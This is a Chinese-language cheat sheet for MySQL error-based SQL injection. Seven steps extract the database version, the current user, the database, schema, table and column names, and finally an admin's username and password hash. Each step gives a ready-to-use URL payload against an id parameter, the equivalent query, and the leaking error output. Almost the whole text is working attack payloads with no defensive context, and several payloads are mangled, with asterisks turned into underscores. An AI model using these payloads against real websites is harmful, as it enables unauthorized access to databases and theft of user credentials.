0x01 爆数据库版本

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*)_,concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)_2))x from information_schema.tables group by x)a)

数据库语句: select _ from test where id =1 and(select 1 from(select _count(),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> select * from test where id =1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~5.5.53~1' for key 'group_key'

0x02 爆当前连接用户

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*)_,concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)_2))x from information_schema.tables group by x)a)

数据库语句: select _from test where id =1 and(select 1 from(select _count(),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> select * from test where id =1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~root@localhost~1' for key 'group_key'

0x03 爆当前连接的数据库

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*)_,concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)_2))x from information_schema.tables group by x)a)

数据库语句: select _from test where id =1 and(select 1 from(select _count(),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> select * from test where id =1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  3. ERROR 1062 (23000): Duplicate entry '~test~1' for key 'group_key'

0x04 爆库名

注意: LIMIT 0 修改会显示其他库名
例如:
修改为0 就是出1库
修改为1 就是出2库

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*)_,concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)_2))x from information_schema.tables group by x)a)

数据库语句-爆库名1: select _from test where id =1 and(select 1 from(select _count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句-爆库名2: select _from test where id =1 and(select 1 from(select _count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> select * from test where id =1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~information_schema~1' for key 'group_key'

0x05 爆表名

注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据

注意: LIMIT 0 修改会爆出不同的表名
例如:
修改为0 就是出1表
修改为1 就是出2表

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*)_,concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)_2))x from information_schema.tables group by x)a)

数据库语句-爆当前库的第一张表名: select _from test where id =1 and(select 1 from(select _count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句-爆当前库的第二张表名: select _from test where id =1 and(select 1 from(select _count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> select * from test where id =1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  3. ERROR 1062 (23000): Duplicate entry '~tdb_goods~1' for key 'group_key'

0x06 暴字段

table_schema = “xx” 要爆的数据库名
table_name = “xx” 要爆的表名

limit 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password

web语句: http://www.test.com/sql.php?id=1 and(select 1 from(select count(*)_,concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=’test’ and table_name=’tdb_admin’ limit 0,1),floor(rand(0)_2))x from information_schema.tables group by x)a)

数据库语句-爆test库 tdb_admin表的字段名:
select _from test WHERE id = 1 and(select 1 from(select _count(),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=’test’ and table_name=’tdb_admin’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> SELECT * FROM test WHERE id = 1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~id~1' for key 'group_key'

0x07 爆内容

注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*)_,concat((select (select (select concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e))) from 库名.表名 limit 0,1),floor(rand(0)_2))x from information_schema.tables group by x)a)

数据库语句: select _from test WHERE id = 1 and(select 1 from(select _count(),concat((select (select (select concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e))) from 库名.表名 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> SELECT * FROM test WHERE id = 1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,id,0x3a,username,0x3a,password,0x7e))) from test.tdb_admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~1:admin:7fef6171469e80d32c0559f88b377245~1
  3. ' for key 'group_key'